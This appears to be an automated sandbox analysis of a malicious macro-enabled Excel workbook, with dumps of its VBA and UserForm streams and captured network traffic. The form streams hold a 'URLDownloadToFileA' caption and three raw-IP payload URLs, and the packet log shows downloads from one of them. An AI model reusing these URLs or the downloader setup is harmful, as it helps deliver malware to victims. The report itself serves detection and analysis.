Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . V d g t j g h k B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 08 00 00 56 64 67 74 6a 67 68 6b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 698

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	698
Entropy:	5.28132485046
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37

Stream Path: _VBA_PROJECT_CUR/PROJECTlk, File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537, Stream Size: 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTlk
File Type:	dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
Stream Size:	30
Entropy:	1.37215976263
Base64 Encoded:	False
Data ASCII:	. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
Data Raw:	01 00 01 00 00 00 22 45 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 140

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	140
Entropy:	3.43277227638
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 5 . M . o . d . u . l . e . 5 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 35 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 35 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 302

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	302
Entropy:	4.65399600072
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U R L D o w n l o a d T o F i l e A " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 52 4c 44 6f 77 6e 6c 6f 61 64 54 6f 46 69 6c 65 41 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69

Stream Path: _VBA_PROJECT_CUR/UserForm2/f, File Type: data, Stream Size: 226

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/f
File Type:	data
Stream Size:	226
Entropy:	2.95233038999
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 1 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . 8 . . . . . . . L a b e l 2 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 3 . . . . . . . . . . . . ( . . . . . . . . . . . . . 2 . . . H . . . . . . . L a b e l 4 . . . . . . . . . .
Data Raw:	00 04 20 00 08 0c 00 0c 0a 00 00 00 10 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 b4 00 00 00 00 84 01 00 00 00 28 00 f5 01 00 00 06 00 00 80 07 00 00 00 32 00 00 00 48 00 00 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d4 00 00 00 d4 00 00 00 00 00 28 00 f5 01 00 00 06 00 00 80 08 00 00 00 32 00 00 00 38 00 00 00 01 00 15 00 4c 61 62 65 6c 32

Stream Path: _VBA_PROJECT_CUR/UserForm2/o, File Type: data, Stream Size: 272

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2/o
File Type:	data
Stream Size:	272
Entropy:	3.65039542802
Base64 Encoded:	True
Data ASCII:	. . ( . ( . . . . . . . h t t p : / / 1 9 0 . 1 4 . 3 7 . 1 8 7 / . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . . . ( . . . . . . . u R l M o n . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a 1 . . . ( . ( . . . . . . . h t t p : / / 9 4 . 1 4 0 . 1 1 2 . 1 2 6 / . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . T a h o m a . . . . ( . ( . . . . . . . h t t p : / / 1 8 5 . 1 4 1 . 2 7 . 2 1 3 / . . . . . . . . . . . . . . 5 . . . . . . .
Data Raw:	00 02 28 00 28 00 00 00 15 00 00 80 68 74 74 70 3a 2f 2f 31 39 30 2e 31 34 2e 33 37 2e 31 38 37 2f 02 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 b1 ff 00 02 18 00 28 00 00 00 06 00 00 80 75 52 6c 4d 6f 6e 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 cc 02 00 00 54 61 68 6f 6d 61 31 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4469

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4469
Entropy:	4.43292705507
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b5 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2476

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2476
Entropy:	3.52262448927
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . a . X P B
Data Raw:	93 4b 2a b5 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 146

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	146
Entropy:	1.48909835582
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 170

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	170
Entropy:	1.65437585425
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . 2 . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff 0c 00 00 00 00 00 00 12 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 156

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	156
Entropy:	1.63365900945
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1073

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	1073
Entropy:	6.68948856439
Base64 Encoded:	True
Data ASCII:	. - . . . . . . . . . . 0 . J . . . . H . . H . . . . . . H . . . d . . . . . . . . V B A P r @ o j e c t . . . . T . @ . . . . . = . . . + . r . . . . . . . . . T . I c . . . . J < . . . . . . 9 s t d o l . e > . . s . t . d . . o . l . e . . . . h . % ^ . . * \\ G . { 0 0 0 2 0 4 3 . 0 - . . . . C . . . . . . . 0 0 4 6 } # 2 . . 0 # 0 # C : \\ W . i n d o w s \\ S . y s t e m 3 2 \\ . . e 2 . t l b # O . L E A u t o m . a t i o n . 0 . . . E O f f i c . E O . . f . . i . c . E . . . . . . . . E 2 D F 8 D
Data Raw:	01 2d b4 80 01 00 04 00 00 00 03 00 30 aa 4a 02 90 02 00 48 02 02 48 09 00 c0 12 14 06 48 03 00 01 64 e3 04 04 04 00 0a 00 84 56 42 41 50 72 40 6f 6a 65 63 74 05 00 1a 00 54 00 40 02 0a 06 02 0a 3d 02 0a 07 2b 02 72 01 14 08 06 12 09 02 12 c3 54 a0 49 63 07 00 0c 02 4a 3c 02 0a 04 16 00 01 39 73 74 64 6f 6c 04 65 3e 02 19 73 00 74 00 64 00 00 6f 00 6c 00 65 00 0d 14 00 68 00 25 5e

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
09/28/21-22:15:36.369264	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22
09/28/21-22:15:41.392548	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22
09/28/21-22:15:47.400673	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.153	192.168.2.22
09/28/21-22:15:59.416683	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22
09/28/21-22:16:02.428431	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22
09/28/21-22:16:07.600790	ICMP	399	ICMP Destination Unreachable Host Unreachable	190.2.158.155	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 22:14:49.338112116 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:49.525563002 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:49.525659084 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:49.526351929 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:49.714071035 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548295975 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548338890 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548356056 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548373938 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548393011 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548434019 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548446894 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548464060 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548481941 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548500061 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.548604012 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.548624992 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.557245970 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.736383915 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.736558914 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.736617088 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.736656904 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.736685991 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.736732960 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.736737967 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.736780882 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.754347086 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754371881 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754384995 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754396915 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754412889 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754425049 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754436970 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754451990 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754472017 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754487991 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754497051 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.754508972 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754539967 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.754547119 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.754551888 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.754560947 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.754606009 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.755947113 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.924300909 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.924506903 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.960880041 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.960932016 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.960954905 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.960975885 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.960995913 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961014986 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961039066 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961060047 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961075068 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961081028 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961100101 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961102009 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961105108 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961117029 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961122990 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961133003 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961143970 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:50.961153030 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.961170912 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:50.962615967 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.112231016 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.112473011 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.175371885 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175400019 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175419092 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175436974 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175456047 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175476074 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175492048 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175509930 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175522089 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175539017 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175549030 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.175551891 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175565004 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.175574064 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.175580978 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.175669909 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.177052975 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.300004959 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.300180912 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376041889 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376087904 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376116037 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376137972 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376173973 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376209021 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376231909 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376319885 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376394033 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376472950 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376512051 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376652002 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376734972 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376846075 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376859903 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376904011 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.376945972 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.376969099 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.378413916 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.489087105 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.489274025 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.581852913 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581876040 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581887960 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581901073 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581917048 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581933022 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581953049 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581970930 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.581988096 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.582010031 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.582024097 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.582026005 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.582037926 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.582062006 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.582071066 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.583751917 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.676791906 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.677642107 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.790592909 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.790779114 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.791970015 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792066097 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792099953 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792146921 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792182922 CEST	80	49167	190.14.37.187	192.168.2.22
Sep 28, 2021 22:14:51.792237997 CEST	49167	80	192.168.2.22	190.14.37.187
Sep 28, 2021 22:14:51.792277098 CEST	80	49167	190.14.37.187	192.168.2.22
